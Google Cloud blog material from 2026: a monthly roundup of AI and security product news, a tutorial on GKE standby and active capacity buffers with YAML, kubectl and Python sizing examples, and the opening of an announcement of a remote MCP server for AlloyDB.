Trusted Cloud: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.
New partner-supported workflows for Google Security Operations: This new robust cohort of partner integrations includes partners developing their own agentic security operations centers (SOCs).

You can catch up on all our security announcements from Next ’26 here.

News you can use

Guide to prompting Gemini 3.1 Flash TTS (text-to-speech): The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model here.
Ultimate prompting guide for Lyria 3 models: Lyria 3, Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. So we spent weeks testing against every musical genre and use case we could imagine. We put together this guide to share exactly what we learned and how you can get the best results.
How to find the sweet spot between cost and performance: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.
Essential AI and cloud security now on by default: To support the next generation of AI innovators, we are turning on essential AI security and cloud security by default in Security Command Center Standard.
Securing AI inference on GKE with Model Armor: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.
Cloud CISO Perspectives: AI, security, and the workforce of the future: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.

March

March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era.

Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.

Top hits:

Gemini Embedding 2: Our first natively multimodal embedding model: Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.
Build with Veo 3.1 Lite, our most cost-effective video generation model: This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now available on Vertex AI.

Here’s a fun bonus: Check out our ultimate prompting guide for Veo 3.1 to get started.

Welcoming Wiz to Google Cloud: Redefining security for the AI era: Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.
Gemini 3.1 Flash Live: Making audio AI more natural and reliable: We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it leads with a score of 90.8% compared to our previous model.

News you can use:

The ultimate Nano Banana prompting guide: This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to find their limits. We put together this guide to share exactly what we learned and how you can get the best results. Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]

A developer’s guide to training with Ironwood TPUs: In this guide, we hear from Lillian Yu, CPA, CA, Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.
How to build production-ready AI agents with Google-managed MCP servers: In this guide, we anchor on a specific example. Cityscape is a demo agent built with Google's Agent Development Kit (ADK) that turns a simple text prompt, like "Generate a cityscape for Kyoto", into a unique, AI-generated city image. Check out the guide to learn more.

February

In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.

Here’s a rundown of our latest news, tools, and resources to help you build what’s next.

Top hits

Pro-level image generation gets faster and more accessible with Nano Banana 2: To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out our blog to see how this comes to life (and how customers are putting the model to work).

Introducing Gemini 3.1 Pro on Google Cloud: Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI: Now generally available on Vertex AI, explore our sample notebook to get started and visit our documentation for comprehensive pricing and regional availability details.
New AI threats report: Distillation, experimentation, and integration: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.

News you can use

A developer's guide to production-ready AI agents: To help developers work through the challenges of taking agents to production, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s 5-Day AI Agents Intensive, and they’ve proven so popular and useful that we wanted to make sure a wider audience had access as well.
Gemini Enterprise Agent Ready (GEAR) program now available: We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.
Your guide to Provisioned Throughput (PT) on Vertex AI: Check out this deep-dive blog designed to show you the resources available today on Vertex AI and how to get started with capacity planning.
How AI can boost defenders, from defense in depth to the cyber kill chain (Q&A): We know that defenders are also developing powerful AI tools, but what’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses against AI-powered attacks.

January

We used to have to learn the language of computers. In 2026, they’re learning ours.

We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "invisible shelf" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other.

We brought that same fluency to our creative and technical tools:

Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.
Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.

Let’s dive in.

Top hits

1. Gemini Enterprise for Customer Experience (CX): Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising.

2. We announced Universal Commerce Protocol (UCP): A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).

3. We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode: Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:

Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images.
Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.
State-of-the-art upscaling to 1080p and 4K resolution for high-fidelity production workflows.

These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.

4. Vibe querying with comments-to-SQL: Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the blog.

News you can use

Mastering Gemini CLI: Your complete guide from installation to advanced use-cases: We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code & Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.
How Google SREs use Gemini CLI to solve real-world outages: In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.
Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run: In this blog, we will show you how to vibe code your first app, which uses the Gemini 3 Flash Preview model, and deploy it to a publicly accessible URL on Google Cloud Run. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps with Gemini 3.
Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud: We know that security and data privacy are the top concern for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud.
The truths about AI hacking that every CISO needs to know (Q&A): How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.

Introducing the GKE standby buffer: Improve node startup times without blowing your budget

Mon, 01 Jun 2026 16:00:00 +0000

Application owners and platform engineers have long faced a difficult choice: spend excessively by over-provisioning to guarantee quick startups, or minimize costs but endure slow cold starts.

We are excited to announce a solution to this compromise: Google Kubernetes Engine standby buffers. This builds on the launch of GKE active buffers earlier this year, a native version of the Kubernetes CapacityBuffers API that makes it easy to provision readily available capacity to handle traffic spikes, delivering near-zero startup latency for new pods. However, active buffers still impose a trade-off between performance and cost. New GKE standby buffers help by maintaining a low-cost, suspended capacity buffer for your GKE clusters. With a cost overhead in the low single-digit percentages, GKE standby buffers help you achieve near-immediate scheduling for your workloads. This is useful for all kinds of workloads: general-purpose, agentic, and everything in between.

Under identical traffic loads, the cluster without standby buffers suffered severe latency spikes, with P50, P95, and P99 metrics trapped between 4 and 6 minutes. Conversely, the cluster with standby buffers maintained a P50 latency of just single-digit seconds, while its P95 and P99 metrics briefly peaked at one minute before quickly normalizing to single-digit seconds. Both setups exhibited a similar allocatable core cost, making the buffered approach far more efficient.

The problem: High costs and latency

Traditionally, autoscaling with standard Kubernetes has been effective but slow. Traffic surges or batch jobs require cluster autoscalers to provision fresh nodes, leaving Pods in a pending state. To circumvent delays, you have to resort to clunky workarounds like lowering your Horizontal Pod Autoscaler (HPA) thresholds or managing so-called balloon pods. These workarounds are expensive:

Managing balloon pods is operationally complex, requiring manual configuration and ongoing maintenance of priority classes and resource requests to ensure they function correctly.
Lowering the HPA threshold adds empty (wasted) space that linearly scales with the size of the node pool.
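The cost of lowering the HPA threshold follows from the HPA scaling rule, desiredReplicas = ceil(currentReplicas × currentMetric / targetMetric). At steady state, average utilization sits near the target, so roughly (100 − target)% of requested CPU stays idle, and that idle amount grows linearly with the size of the workload. The Python sketch below works through the arithmetic. The 0.1 tolerance is the Kubernetes default; the core counts and targets in the tests are illustrative only.

```python
import math

HPA_TOLERANCE = 0.1  # Kubernetes default for --horizontal-pod-autoscaler-tolerance


def hpa_desired_replicas(current_replicas: int, current_pct: int, target_pct: int) -> int:
    """HPA scaling rule: ceil(currentReplicas * currentMetric / targetMetric)."""
    ratio = current_pct / target_pct
    if abs(ratio - 1.0) <= HPA_TOLERANCE:
        return current_replicas  # within tolerance: the HPA does not scale
    return math.ceil(current_replicas * current_pct / target_pct)


def idle_cores(busy_cores: float, target_pct: int) -> float:
    """Requested-but-unused cores when average utilization sits at target_pct."""
    provisioned = busy_cores * 100 / target_pct
    return provisioned - busy_cores
```

With 100 busy cores, a target of 80% leaves 25 idle cores, while a target of 50% leaves 100; doubling the workload at 50% doubles the idle cores to 200.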

Both GKE active and standby buffers allow capacity to be defined declaratively, removing the need for clunky and operationally heavy workarounds.

In addition, GKE standby buffers lower infrastructure costs by storing the node’s state to disk, releasing compute and memory costs and keeping only persistent disk and IP address costs. Then, combined with an active buffer, you can achieve near-instant pod scheduling that has similar performance to over-provisioning, but at a very affordable price.
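The cost argument above can be made concrete with a small model: a running buffer node bills compute, memory, disk, and IP, while a suspended standby node bills only disk and IP. This Python sketch compares keeping every buffer node running against a mix of a few active nodes and more standby nodes. All prices are hypothetical integers in cents per node-hour, chosen only to show the shape of the calculation, and the model does not attempt to reproduce the benchmark figures reported below.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class HourlyPrices:
    # Hypothetical prices in cents per node-hour; substitute your own SKUs.
    vm: int    # compute and memory of a running node
    disk: int  # persistent disk that holds the suspended node state
    ip: int    # IP address kept while suspended


def always_on_cost(nodes: int, hours: int, p: HourlyPrices) -> int:
    """Over-provisioning: every buffer node runs, and bills, all the time."""
    return nodes * hours * (p.vm + p.disk + p.ip)


def mixed_buffer_cost(active: int, standby: int, hours: int, p: HourlyPrices) -> int:
    """Active nodes bill fully; suspended standby nodes bill only disk and IP."""
    running = active * hours * (p.vm + p.disk + p.ip)
    suspended = standby * hours * (p.disk + p.ip)
    return running + suspended
```

With these made-up prices, 10 always-on buffer nodes for a day cost 24,720 cents, while 2 active plus 8 standby nodes cost 5,520 cents, about 78% less. The real ratio depends on your machine types and disk sizes.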

Active and standby buffers working together

All GKE capacity buffers operate on a principle similar to video streaming on platforms like YouTube. By proactively attempting to provision and manage available capacity ahead of impending demand (much like pre-downloading video content), GKE helps to ensure that resources are readily available when they’re needed.

With today’s launch, the two types of capacity buffers can work in harmony:

Active buffer: Cluster Autoscaler works to reserve enough capacity for a predefined number of pods on existing cluster nodes and, if needed, provisions extra nodes. Select this ready-to-use buffer to provide capacity to your most latency-sensitive workloads.
Standby buffer: Nodes are pre-provisioned and fully initialized with necessary components like Kubernetes DaemonSets, and given time to preload images, but are then suspended, and the underlying compute capacity is released to save costs. When demand spikes, these nodes resume 2-3x faster than creating a fresh node, bridging the gap between cold starts and always-on capacity.

The active buffer covers the initial spike until standby buffers resume. The system prioritizes refilling the active buffer from the standby buffer. The standby buffer handles an extended load and protects against slower node cold starts. As standby buffers refill, they initially kick into an active state for a configurable amount of time before they are suspended, providing a boost of active capacity during sustained traffic loads.
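The division of labor between the two buffers can be illustrated with a toy model of a single burst of pods arriving at once. This Python sketch ignores the refill of the active buffer from standby and the post-resume active window. The resume and cold-start times are hypothetical, with resume set to one third of cold start to match the 2-3x claim. Pods that fit on active capacity schedule immediately, the next tranche waits for standby nodes to resume, and the rest wait for fresh nodes.

```python
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class BufferConfig:
    active_slots: int          # pods that fit on running active-buffer capacity
    standby_slots: int         # pods that fit once suspended standby nodes resume
    resume_seconds: float      # hypothetical time to resume a standby node
    cold_start_seconds: float  # hypothetical time to create a fresh node


def burst_latencies(pods: int, cfg: BufferConfig) -> list[float]:
    """Scheduling latency for each pod in a burst that arrives all at once."""
    latencies = []
    for i in range(pods):
        if i < cfg.active_slots:
            latencies.append(0.0)                     # active buffer absorbs the spike
        elif i < cfg.active_slots + cfg.standby_slots:
            latencies.append(cfg.resume_seconds)      # waits for a standby resume
        else:
            latencies.append(cfg.cold_start_seconds)  # needs a brand-new node
    return latencies


def percentile(values: list[float], p: int) -> float:
    """Nearest-rank percentile, with p in 1..100."""
    ordered = sorted(values)
    rank = max(1, math.ceil(p * len(ordered) / 100))
    return ordered[rank - 1]
```

For a 60-pod burst with 10 active slots, 40 standby slots, a 40-second resume, and a 120-second cold start, P50 latency is 40 seconds. Without the standby tier, P50 jumps to the full 120-second cold start.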

Early benchmarks

In our tests, using standby buffers enabled us to deliver sub-second Agent Sandbox scheduling latency for up to 90% lower cost compared to complete overprovisioning.

Optimized for business needs

Businesses are under constant pressure to optimize resource consumption while streamlining operations. Recognizing that organizations need smarter tools to manage sporadic and spiky workloads, we worked hard to deliver standby buffers quickly. Now, whether you’re running agents, batch jobs, CI/CD pipelines, game servers, or other spiky workloads, GKE capacity buffers let you dynamically balance performance and cost. You can finally define your "insurance policy" against traffic spikes without paying a high premium for it. With GKE standby buffers you can:

Circumvent cold starts: Nodes suspended by standby buffers resume 2-3x faster than provisioning fresh nodes, reducing pod scheduling latency during traffic spikes and sustained traffic load.
Enjoy lower costs: A standby buffer incurs a fraction of the cost of active capacity because the underlying VM is suspended. You pay for storage and an IP address, rather than for full compute-hours.
Gain declarative control: Replace complex balloon pod workarounds with the simple, native declarative CapacityBuffers API, explicitly stating how much headroom you need, and letting GKE handle the rest.

“Using GKE standby capacity buffers has lowered our time-to-ready from several minutes to 30 seconds at a very affordable price.”
- Pedro Spagiari, Chief Architect at Unico

Get started

Ready to improve your performance and save on costs?

Start by defining a CapacityBuffer resource in your cluster to specify your target buffer size.
Try balancing between standby buffers to reduce pod scheduling latency for sustained loads, and active buffers to address immediate unpredictable capacity needs.

Let’s look at an example of how to configure buffers for a Deployment while also using custom ComputeClasses.

Basic setup

Beginning with some basic setup, create a namespace:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: my-namespace
```

Then, create a custom ComputeClass (optional):

```yaml
apiVersion: cloud.google.com/v1
kind: ComputeClass
metadata:
  # ComputeClass is cluster-scoped, so no namespace is set.
  name: my-ccc
spec:
  # Buffers will also be created according to these priorities.
  priorities:
  - machineFamily: n4
  - machineFamily: n4d
  - machineFamily: c4
  - machineFamily: c4d
  nodePoolAutoCreation:
    enabled: true
```

Define the buffer unit size

You can use a PodTemplate as a reference for the buffer unit size. You can also create a buffer for a specific Deployment or for any other object that implements the scale subresource.

```yaml
# Defines the resource requirements for one unit of buffer.
apiVersion: v1
kind: PodTemplate
metadata:
  name: my-buffer-unit-template
  namespace: my-namespace
template:
  spec:
    terminationGracePeriodSeconds: 0
    tolerations:
    # Optional: Ensures buffer pods can land on any node.
    - key: "node-role.kubernetes.io/master"
      operator: "Exists"
      effect: "NoSchedule"
    containers:
    - name: buffer-container
      image: registry.k8s.io/pause:3.9
      resources:
        requests:
          cpu: "1"
          memory: "1Gi"
        limits:
          cpu: "1"
          memory: "1Gi"
    # Optional: selects the custom ComputeClass, which controls
    # the properties of the nodes GKE provisions.
    nodeSelector:
      cloud.google.com/compute-class: my-ccc
```
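A PodTemplate is one way to define a unit. Because a buffer can also reference any object that implements the scale subresource, the following Python sketch builds a CapacityBuffer that tracks a Deployment instead. The `scalableRef` and `percentage` field names are assumptions taken from the open-source Cluster Autoscaler CapacityBuffer proposal, and the buffer name is hypothetical. Verify both against the GKE documentation before using them.

```python
import json


def scalable_buffer(name: str, namespace: str, deployment: str, percentage: int) -> dict:
    """Build a CapacityBuffer manifest sized relative to a Deployment.

    Assumption: `scalableRef` and `percentage` follow the upstream CapacityBuffer
    API; check the field names against the GKE documentation.
    """
    return {
        "apiVersion": "autoscaling.x-k8s.io/v1beta1",
        "kind": "CapacityBuffer",
        "metadata": {"name": name, "namespace": namespace},
        "spec": {
            # Any object that implements the scale subresource can be referenced.
            "scalableRef": {"apiGroup": "apps", "kind": "Deployment", "name": deployment},
            # Assumed semantics: buffer size as a percentage of the target's replicas.
            "percentage": percentage,
            "provisioningStrategy": "buffer.x-k8s.io/active-capacity",
        },
    }


if __name__ == "__main__":
    manifest = scalable_buffer("my-deployment-buffer", "my-namespace", "my-deployment", 10)
    print(json.dumps(manifest, indent=2))
```

kubectl accepts JSON manifests, so you can pipe the script's output into `kubectl apply -f -`.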

Create buffers

Lastly, create a CapacityBuffer object that references the PodTemplate. Here, you create a standby buffer limited to 50 CPUs and 50 GiB of memory, which at 1 CPU and 1 GiB per unit amounts to 50 buffer units:

```yaml
apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-standby-buffer-resource-limits
  namespace: my-namespace
  annotations:
    # Optional: Time after which buffer nodes are suspended.
    # Default is 5 minutes.
    buffer.gke.io/standby-capacity-init-time: "5m"
    # Optional: Time after which standby buffers are recreated.
    # Default is 1 day; "never" disables refreshing.
    buffer.gke.io/standby-capacity-refresh-frequency: "1d"
spec:
  podTemplateRef:
    name: my-buffer-unit-template
  # The desired state is 50 standby buffer units (50 CPUs / 1 CPU per unit).
  # When a standby buffer unit gets used, a new one gets created.
  limits:
    cpu: "50"
    memory: "50Gi"
  provisioningStrategy: "buffer.gke.io/standby-capacity"
```

Optionally, also create an active buffer limited to 5 CPUs and 5 GiB of memory, or five buffer units:

```yaml
apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-active-buffer-resource-limits
  namespace: my-namespace
spec:
  podTemplateRef:
    name: my-buffer-unit-template
  # The desired state is 5 active buffer units (5 CPUs / 1 CPU per unit).
  # When an active buffer unit gets used, a new one gets created.
  limits:
    cpu: "5"
    memory: "5Gi"
  provisioningStrategy: "buffer.x-k8s.io/active-capacity"
```
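To sanity-check how resource limits translate into buffer units, here is a small Python sketch. It assumes a limits-based buffer holds as many whole template-sized units as fit within every limit. The parsers handle only plain CPU values, the `m` suffix, and the binary memory suffixes used in this post, not the full Kubernetes quantity grammar. With the 1 CPU / 1 GiB unit defined earlier, the 50-CPU standby buffer holds 50 units and the 5-CPU active buffer holds 5.

```python
_MEM_SUFFIXES = {"Ki": 2**10, "Mi": 2**20, "Gi": 2**30, "Ti": 2**40}


def parse_cpu(q: str) -> float:
    """Parse a CPU quantity such as "1", "0.5", or "500m" into cores."""
    return float(q[:-1]) / 1000 if q.endswith("m") else float(q)


def parse_mem(q: str) -> int:
    """Parse a memory quantity such as "500Mi" or "50Gi" into bytes."""
    for suffix, factor in _MEM_SUFFIXES.items():
        if q.endswith(suffix):
            return int(float(q[: -len(suffix)]) * factor)
    return int(q)  # no suffix: plain bytes


def units_within_limits(limit_cpu: str, limit_mem: str, unit_cpu: str, unit_mem: str) -> int:
    """Whole buffer units that fit inside both the CPU and the memory limit."""
    by_cpu = int(parse_cpu(limit_cpu) // parse_cpu(unit_cpu))
    by_mem = parse_mem(limit_mem) // parse_mem(unit_mem)
    return min(by_cpu, by_mem)


print(units_within_limits("50", "50Gi", "1", "1Gi"))  # standby buffer
print(units_within_limits("5", "5Gi", "1", "1Gi"))    # active buffer
```

Whichever limit runs out first determines the unit count, so a memory-heavy template can shrink a buffer even when CPU headroom remains.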

Finally, apply the above objects to your cluster. That’s it!

Now, any existing and future deployments that can schedule on the space reserved by the buffers will benefit from faster pod scheduling latencies.

Test the buffers

You can check the status of your buffers. In Kubernetes, suspended nodes can be identified by the Suspended node condition.

```shell
kubectl get nodes -o custom-columns='NAME:.metadata.name,SUSPENDED:.status.conditions[?(@.type=="Suspended")].status'
```

Expect output similar to the following, and wait until the standby buffer nodes are suspended (SUSPENDED shows True):

```
NAME                                              SUSPENDED
gke-my-cluster-nap-n4-standard-8-k960-...-ffbx    False       # Node has been resumed.
gke-my-cluster-nap-n4-standard-4-k960-...-h2x4    <none>      # Node was never suspended.
gke-my-cluster-nap-n4d-standard-8-1cip-...-74jf   True        # Node is suspended.
```
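If you would rather script this check, the Python sketch below reads the same Suspended node condition from JSON saved with `kubectl get nodes -o json > nodes.json`. It relies only on the standard Kubernetes node object shape. The helper names are hypothetical.

```python
import json
from collections import Counter


def node_suspension_states(nodes_json: dict) -> dict[str, str]:
    """Map each node name to its "Suspended" condition status, or "<none>" if absent."""
    states = {}
    for node in nodes_json.get("items", []):
        conditions = node.get("status", {}).get("conditions", [])
        status = next(
            (c.get("status", "Unknown") for c in conditions if c.get("type") == "Suspended"),
            "<none>",
        )
        states[node["metadata"]["name"]] = status
    return states


def summarize(states: dict[str, str]) -> Counter:
    """Count nodes per state, for example how many standby nodes are suspended."""
    return Counter(states.values())


def load_nodes(path: str) -> dict:
    """Load output saved with: kubectl get nodes -o json > nodes.json"""
    with open(path, encoding="utf-8") as f:
        return json.load(f)
```

For example, `summarize(node_suspension_states(load_nodes("nodes.json")))["True"]` gives the number of suspended nodes. You can poll this value until it matches the standby capacity you expect.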

To test the buffers, create a deployment and scale it.

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-deployment
  namespace: my-namespace
spec:
  replicas: 1
  selector:
    matchLabels:
      app: my-deployment
  template:
    metadata:
      labels:
        app: my-deployment
    spec:
      containers:
      - name: busybox
        image: busybox
        command: ["sleep", "inf"]
        resources:
          requests:
            cpu: "500m"
            memory: "500Mi"
      # Optional: selects the custom ComputeClass, which controls
      # the properties of the nodes GKE provisions.
      nodeSelector:
        cloud.google.com/compute-class: my-ccc
```

Scaling this Deployment to two replicas lets the new replica be scheduled immediately on the active buffer's capacity. The active buffer is then refilled from the standby buffer while, at the same time, the standby buffer starts provisioning new nodes to replace the capacity that was consumed.

If you scale the Deployment further to 50 replicas, the replicas that don't fit in the active buffer are scheduled on standby buffer nodes as soon as those nodes resume. New nodes provisioned to refill the standby buffer briefly act as active capacity before they are suspended, providing a temporary boost. As a result, if you scale the Deployment to 100 replicas during this window, you may notice that the new replicas are also scheduled immediately.
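To observe these effects, you can measure each pod's scheduling latency as the time between its `creationTimestamp` and the moment its `PodScheduled` condition became True. The Python sketch below does this for JSON saved with `kubectl get pods -n my-namespace -o json > pods.json`. Kubernetes timestamps have one-second resolution, so sub-second scheduling shows up as 0 seconds. The helper names are hypothetical.

```python
from datetime import datetime


def _ts(value: str) -> datetime:
    """Parse a Kubernetes RFC 3339 timestamp such as "2026-06-01T12:00:03Z"."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def scheduling_latencies(pods_json: dict) -> dict[str, float]:
    """Seconds from pod creation until its PodScheduled condition became True.

    Pods that are still pending (no True PodScheduled condition) are omitted.
    """
    latencies = {}
    for pod in pods_json.get("items", []):
        created = _ts(pod["metadata"]["creationTimestamp"])
        for cond in pod.get("status", {}).get("conditions", []):
            if cond.get("type") == "PodScheduled" and cond.get("status") == "True":
                scheduled = _ts(cond["lastTransitionTime"])
                latencies[pod["metadata"]["name"]] = (scheduled - created).total_seconds()
    return latencies
```

Comparing the maximum latency before and after scaling shows which replicas landed on active capacity and which waited for standby nodes to resume.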

GKE standby buffer best practices

When working with GKE standby buffers, here are a few things to consider:

Define standby buffers that are sufficient to cover the extended load you expect to encounter, so that buffers can refill in the background from a cold start. A sufficiently sized standby buffer can drop your max pod scheduling latency to the time it takes to resume a node — around 30 seconds.
When the buffer starts to get used and is refilled, new buffer nodes initially swing into an active state prior to suspending. This helps to boost active capacity during a prolonged load.
If your application requires the lowest possible pod scheduling latency, define an active buffer size that is sufficient to cover any initial spikes you expect to encounter until standby buffer nodes are able to resume. The system prioritizes refilling the active buffer by consuming the standby buffer. A sufficiently sized active buffer and a sufficiently sized standby buffer can help you achieve one-second pod scheduling latency for a fraction of the cost of overprovisioning.
Experiment with different buffer sizes to get the best result for your workload.
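The first two guidelines can be turned into a back-of-envelope starting point. This Python sketch is a hypothetical heuristic, not the method used by the simulator linked below. It assumes pods arrive at a steady rate, each pod uses one buffer unit, and you know roughly how long a node resume takes (around 30 seconds, per the guidance above) and how long a cold start takes in your cluster. The standby estimate is conservative because it ignores the active buffer's contribution.

```python
import math


def size_buffers(arrival_pods_per_s: float, resume_s: float, cold_start_s: float) -> tuple[int, int]:
    """Rough buffer sizes in buffer units (one unit per pod).

    active:  covers arrivals until suspended standby nodes resume.
    standby: covers arrivals until freshly provisioned nodes are ready.
    """
    active = math.ceil(arrival_pods_per_s * resume_s)
    standby = math.ceil(arrival_pods_per_s * cold_start_s)
    return active, standby


# Hypothetical inputs: 2 pods/s, 30 s resume, 120 s cold start.
print(size_buffers(2, resume_s=30, cold_start_s=120))
```

Treat the result as a first guess to refine through experimentation, as the last guideline suggests.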

To help, we created a simulator for sizing buffers to meet your performance targets, available at https://github.com/gke-labs/buffers-simulator.

Try it yourself!

Active and standby buffers in GKE provide a native solution for low-latency and cost-effective workload scaling by maintaining warm and standby capacity buffers. By circumventing slow node cold starts, buffers help performance-critical applications handle sudden traffic spikes. This feature replaces complex manual workarounds like balloon pods with a simple, declarative API, and allows for fixed, percentage-based, or resource-limited buffering strategies to help maintain strict service-level objectives cost-effectively and without over-provisioning for peak.

Standby buffers are available for GKE clusters running version 1.36.0-gke.2253000 or later. To get started with buffers, check out the documentation.

The fully-managed Remote MCP Server for AlloyDB is now Generally Available

Mon, 01 Jun 2026 16:00:00 +0000

AI agents possess incredible reasoning capabilities and can perform increasingly complex actions. But the reliability of agentic outcomes depends entirely on the quality of the context they can access — context that is frequently locked away in operational databases.

To bridge this gap, we are excited to announce the Remote Model Context Protocol (MCP) Server for AlloyDB is now generally available.

The Model Context Protocol (MCP) is an open-source standard that gives LLMs a secure, consistent way to connect to external data sources. As part of Google Cloud’s recent rollout of 50+ Google-managed MCP servers, this new integration makes it easier than ever for both interactive and autonomous agents to securely harness the full power of your enterprise data. For example, you can now ask an AI agent for an up-to-the-millisecond view of your delivery fleet by connecting it to your real-time logistics data in AlloyDB, avoiding inaccuracies due to stale data and reducing the need for manual reporting.

Why AlloyDB is the strong foundation for agentic apps

By connecting MCP to AlloyDB, your agents get access to the premier database built for enterprise-grade AI. AlloyDB delivers the scale, speed, and intelligence required for the most demanding agentic workloads:

Supercharged vector performance: Scale to over 10 billion vectors at up to 6x the speed of standard PostgreSQL for vector queries (and up to 10x faster for filtered queries) with the ScaNN index.
Advanced search and reranking: Power multimodal applications with hybrid search via RUM (in Preview) and intelligent reranking through Reciprocal Rank Fusion (RRF) or Gemini Enterprise Platform models.
Real-time intelligence: Efficiently generate millions of embeddings using built-in AI Functions to facilitate low-latency, real-time agentic experiences.
Unified data access: Give agents a single PostgreSQL interface to seamlessly join operational data in AlloyDB with analytical data in BigQuery or archived data in Iceberg tables via Lakehouse Federation.
Enterprise-grade scale: Rest easy with a 99.99% SLA, autopilot database optimizations, and auto-scaling read pools with up to 20 nodes.

Why Remote MCP matters for AlloyDB

Local MCP servers are great for local development, but communicating over standard input/output (stdio) streams becomes difficult when you scale to production workloads. It is both architecturally complex and administratively burdensome to provision and manage all of the infrastructure and security guardrails you need to run agents for high-value use cases that interact with sensitive operational data.

The Remote MCP Server for AlloyDB runs on fully-managed Google Cloud infrastructure and exposes an HTTP endpoint that connects your AI applications to your data. This solves key challenges for teams building agents on PostgreSQL:

Centralized discovery: Find, secure, and manage your database's MCP server using Agent Registry.
